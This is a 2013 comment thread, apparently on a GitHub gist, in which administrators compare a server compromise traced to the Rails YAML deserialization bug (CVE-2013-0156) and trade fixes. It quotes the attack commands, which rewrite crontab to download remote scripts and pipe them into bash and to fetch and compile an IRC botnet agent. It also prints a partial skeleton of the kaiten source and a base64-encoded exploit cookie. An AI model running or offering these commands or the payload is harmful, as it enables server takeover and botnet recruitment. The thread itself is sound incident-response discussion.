crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |
This comment has been minimized.
This comment has been minimized.
Hi, I have the same problem.. (1 day ago) |
This comment has been minimized.
This comment has been minimized.
I found just that (with syslog) : May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login) At the moment, I didn't understand how he could do that... I think the man has access because he uploaded this files whitout me noticing. (for me : "k.c" & "sh.py") Be careful. |
This comment has been minimized.
This comment has been minimized.
I have the same problem! This is really CRAZY! How is this even possible that someone can get into the Servers? The server crontab is being overridden with this:
This happened twice in the last 3 days. Not sure how anyone can get into the server and do this. On which data center you are seeing this issue? Ours is on Linode. What did you do to fix that? |
This comment has been minimized.
This comment has been minimized.
Hi, I have a personal server at home, I'm not using any data center. I really don't know how this man got into the server. And i can't believe it is by ssh.. I'm going to look at every logs on my server. I suspect the guy used http protocol.. But I'm really not sure. At the moment, I haven't fixed that, and i think to reinstall my system to be sure to reset all access and maybe remove suspicious programs. Can you tell me briefly what you mean by "security concerns" ? I wonder if he managed to access by one of my wordpress websites. Do you have any website (wordpress type) ? Check your temporaries folders (/var/tmp & /tmp & ...). Because I saw suspicious program files with fake creation dates... Thanks |
This comment has been minimized.
This comment has been minimized.
Do you have a redmine ? |
This comment has been minimized.
This comment has been minimized.
Hi, We have the same problem on customer servers dedicated to a custom Ruby on Rails application. On 2013-05-23:
On 2013-05-24: Today: I suspect (but I have no clue ^^) the root vulnerability which give access to the server might be related to Ruby on Rails. We are using:
And we didn't manage to update our servers because we are still in heavy development mode. We tried to change root password as quick fix but it didn't stop the attacker (I am even not sure that he needs/uses root access as he overrides user-level crontab...). Regards. |
This comment has been minimized.
This comment has been minimized.
Here is the code of kaiten-src.c, kind of botnet agent which was uploaded and run repetitively since the first crontab intrusion: //////////////////////////////////////////////////////////////////////////////// undef STARTUP // Start on startup?undef IDENT // Only enable this if you absolutely have todefine FAKENAME "- bash" // What you want this to hide asdefine CHAN "#rails" // Channel to joindefine TEMPDIR "/var/tmp" // Where to save generated ips text filedefine KEY "" // The key of the channeldefine VERSION "0.1" // dfnctsc-kaiten release versiondefine PORT 6667 // Port of server(s)int numservers = 1; // Must change this to equal number of servers down there include <stdarg.h>include <errno.h>include <stdio.h>include <stdlib.h>include <string.h>include <sys/types.h>include <sys/stat.h>include <fcntl.h>include <strings.h>include <netinet/in.h>include <unistd.h>include <sys/time.h>include <sys/socket.h>include <signal.h>include <arpa/inet.h>include <netdb.h>include <time.h>include <ctype.h>include <sys/wait.h>include <sys/ioctl.h>int sock, changeservers = 0; int strwildmatch(const char* pattern, const char* string) { int send_msg(int sock, char *words, ...) { int mfork(char sender) { void filter(char *a) { char makestring() { long pow(long a, long b) { u_short in_cksum(u_short *addr, int len) { void get(int sock, char _sender, int argc, char *_argv) {
done: void nickc(int sock, char _sender, int argc, char *_argv) { struct iphdr { struct udphdr { struct tcphdr { struct send_tcp { struct pseudo_header { unsigned int host2ip(char *sender, char *hostname) { void move(int sock, char _sender, int argc, char *_argv) { void killd(int sock, char _sender, int argc, char *_argv) { void help(int sock, char _sender, int argc, char *_argv) { struct FMessages {
}; void _PRIVMSG(int sock, char _sender, char *str) { void _376(int sock, char *sender, char *str) { void _PING(int sock, char *sender, char *str) { void 352(int sock, char sender, char *str) { void _433(int sock, char *sender, char *str) { void _NICK(int sock, char _sender, char *str) { struct Messages { void con() { int lockfile() { int main(int argc, char **argv) { ifdef STARTUP
endif
ifdef FAKENAME
endif
sa: ifdef IDENT
endif
} |
This comment has been minimized.
This comment has been minimized.
Hi, Ok that's why I asked if one of you have redmine. Because I found interesting logs. I think he uses "/login?back_url=" nginx/access.log (My redmine)
Here (I don't know how..) he compiled the C program. (for me "k.c" & "sh.py") nginx/error.log
I saw the "k.c" and i have the impression, he uses irc server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails' I think we have to warm all RoR developers... |
This comment has been minimized.
This comment has been minimized.
Salut Remy, Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out: The 'back_url' is URL encodded twice: $ irb 1.9.3p392 :004 > CGI.unescape CGI.unescape s Then the 'HTTP_COOKIE' is base64 blob : $ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0) And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erase user-level crontab replacing by its own crontab. I don't know exactely how it work, it might me related to rack security issue disclosed earlier this year (or perhaps undisclosed vulnerability...). Thanks again for the log! Regards. |
This comment has been minimized.
This comment has been minimized.
Hello, It's pleasure, as we know now what it is about. :) Regards |
This comment has been minimized.
This comment has been minimized.
In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago. |
This comment has been minimized.
This comment has been minimized.
What version is your Redmine? |
This comment has been minimized.
This comment has been minimized.
Redmine provides Security Advisories. |
This comment has been minimized.
This comment has been minimized.
My version is 2.2. @Leglaw : What is your PhPMyAdmin version ? |
This comment has been minimized.
This comment has been minimized.
2.2.x? |
This comment has been minimized.
This comment has been minimized.
Regarding me I am on Rails 3.2.8 with custom application. I have spotted 3 IPs which were sending malicious request to one of our server: The malicious requests are messing with YAML parameters and Session Cookie. from 88.198.20.247: Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000 Rendered layouts/_ride_request_form.html.erb (15.2ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000 Rendered layouts/_ride_request_form.html.erb (4.5ms)Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000 Rendered layouts/_ride_request_form.html.erb (2.9ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000 Rendered layouts/_ride_request_form.html.erb (14.3ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000 Rendered layouts/_ride_request_form.html.erb (3.7ms)Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000 Rendered layouts/_ride_request_form.html.erb (13.2ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000 Rendered layouts/_ride_request_form.html.erb (3.4ms)Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000 Rendered layouts/_ride_request_form.html.erb (2.3ms)Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000 Rendered layouts/_menu.html.erb (0.5ms)Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000 SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000 from 95.138.186.181: Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000 Rendered layouts/_ride_request_form.html.erb (14.7ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000 Rendered layouts/_ride_request_form.html.erb (3.7ms)Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000 Rendered layouts/_ride_request_form.html.erb (2.4ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000 Rendered layouts/_ride_request_form.html.erb (13.1ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000 Rendered layouts/_ride_request_form.html.erb (4.2ms)Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000 from 188.190.126.105: Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000 Psych::SyntaxError ((): control characters are not allowed at line 1 column 1): /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000 Rendered layouts/_ride_request_form.html.erb (15.1ms)Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000 Rendered layouts/_ride_request_form.html.erb (3.5ms)Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000 Psych::SyntaxError ((): control characters are not allowed at line 1 column 1): /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000 Rendered layouts/_ride_request_form.html.erb (3.4ms)Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000 Regards. |
This comment has been minimized.
This comment has been minimized.
It's one of the stable ones, sorry I can't check now. Ruby version: 1.9.3-p327 |
This comment has been minimized.
This comment has been minimized.
Hi here ! I've disconnected my server until finding solution .. and I believe I have it : chmod 700 /usr/bin/wget => http://forums.cpanel.net/f185/wget-abuse-hack-340232.html more search about subject, it seems to be this exploit : |
This comment has been minimized.
This comment has been minimized.
after doing the chmod on wget, I receive another log from my server : /bin/sh: wget: Permission denied not forget to vi /var/spool/cron/crontabs/www-data |
This comment has been minimized.
This comment has been minimized.
last informations, I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux] |
This comment has been minimized.
This comment has been minimized.
Are you running nginx < 1.4.1? http://mailman.nginx.org/pipermail/nginx-announce/2013/000112.html |
This comment has been minimized.
This comment has been minimized.
This is an exploit of an old Rails bug (CVE-2013-0156). Clean your systems and update to 3.2.12. In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches. https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security |
This comment has been minimized.
This comment has been minimized.
I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses. For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access. Sign up to be informed when this is ready here: http://www.rubyaudit.com |
This comment has been minimized.
This comment has been minimized.
please update your rails-installation: |
This comment has been minimized.
This comment has been minimized.
The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck If your server has been compromised, you must rebuild from scratch - updating versions isn't enough. |
This comment has been minimized.
This comment has been minimized.
It looks like it's part of a botnet, as it's using IRC. |
This comment has been minimized.
This comment has been minimized.
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is |
This comment has been minimized.
This comment has been minimized.
You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your |
This comment has been minimized.
This comment has been minimized.
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference. All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks! |
This comment has been minimized.
This comment has been minimized.
Hi, an what about my configuration ?? Server version: Apache/2.2.14 (Ubuntu) no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above). I'm still searching how the malicious scripts were upload to my server ... |
This comment has been minimized.
This comment has been minimized.
Hi, my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough? |
This comment has been minimized.
This comment has been minimized.
definetly |
This comment has been minimized.
This comment has been minimized.
@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1. |
This comment has been minimized.
This comment has been minimized.
Ok, anyway we known now where the problem comes from. |
This comment has been minimized.
This comment has been minimized.
Sounds like this one |
This comment has been minimized.
Hi,
I have the same msg from my server since 3 days, any ideas to block this attempt ?